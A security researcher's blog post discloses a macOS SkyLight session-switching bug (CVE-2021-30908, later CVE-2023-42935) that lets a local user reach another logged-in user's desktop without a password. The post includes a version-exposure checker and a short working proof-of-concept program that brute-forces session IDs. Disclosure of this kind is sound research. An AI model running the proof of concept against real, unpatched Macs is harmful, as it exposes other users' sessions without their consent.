amy's website

SkyLight sessions bug

In various macOS versions, SLSSessionSwitchToSessionID doesn't check if it was called by the login window. This lets any user switch to another logged-in user's desktop without their password. If Guest is enabled, it effectively bypasses the lock screen.

I reported this in September 2021; it was fixed in macOS 11.6.1 and macOS 12.0.1:

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state management.
CVE-2021-30908: ASentientBot

Amusingly, the bug reappeared in macOS Ventura, and it was fixed again in macOS 13.6.4 and macOS 14.1 as CVE-2023-42935.

I received an Apple Security Bounty both times.

It still works on macOS Catalina and older.
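As an added example (not code from the original post), the release boundaries given above can be turned into a quick exposure check: a C function that classifies a macOS product version string as affected or fixed. It assumes that every release before the fix in a given major line is affected, which the post does not state for each individual version.

```c
// Added example: classify a macOS version against the fix boundaries
// stated above (11.6.1, 12.0.1, 13.6.4, 14.1; Catalina and older never fixed).
// Assumption (not from the post): all releases before the fix in a major line are affected.
#include <stdio.h>

// Returns 1 if the unchecked SLSSessionSwitchToSessionID behaviour is present,
// 0 if the version carries the fix, -1 if the string cannot be parsed.
int skylight_switch_affected(const char *version)
{
	int major = 0, minor = 0, patch = 0;
	int n = sscanf(version, "%d.%d.%d", &major, &minor, &patch);
	if (n < 1) return -1;
	if (major <= 10) return 1;                                          /* Catalina and older */
	if (major == 11) return (minor < 6 || (minor == 6 && patch < 1));   /* fixed in 11.6.1 */
	if (major == 12) return (minor == 0 && patch < 1);                  /* fixed in 12.0.1 */
	if (major == 13) return (minor < 6 || (minor == 6 && patch < 4));   /* fixed in 13.6.4 (Ventura regression) */
	if (major == 14) return (minor < 1);                                /* fixed in 14.1 */
	return 0;                                                           /* later releases */
}

int main(int argc, char **argv)
{
	// Constructed default; on a Mac you would pass the output of `sw_vers -productVersion`.
	const char *v = argc > 1 ? argv[1] : "13.6.3";
	int r = skylight_switch_affected(v);
	if (r < 0) { fprintf(stderr, "unparseable version: %s\n", v); return 2; }
	printf("macOS %s: %s\n", v, r ? "affected (CVE-2021-30908 / CVE-2023-42935)" : "fixed");
	return 0;
}
```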

thanks

Thank you to emma (916253) and ASentientHedgehog for testing on countless versions and helping me navigate the reporting process!

sample code

This program will switch to another user's desktop on affected versions.

// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing && ./thing

@import Foundation;
@import Darwin;

// Private SkyLight function; on affected versions it does not verify that the caller is the login window.
void SLSSessionSwitchToSessionID(int);

int main()
{
	// Try session IDs in increasing order until one of the switches takes effect.
	for(int guess=0;;guess++)
	{
		SLSSessionSwitchToSessionID(guess);

		// /dev/console is owned by whichever user currently holds the console;
		// once that is no longer us, the switch has succeeded.
		struct stat consoleInfo;
		assert(!stat("/dev/console",&consoleInfo));
		if(consoleInfo.st_uid!=getuid())
		{
			break;
		}
	}
}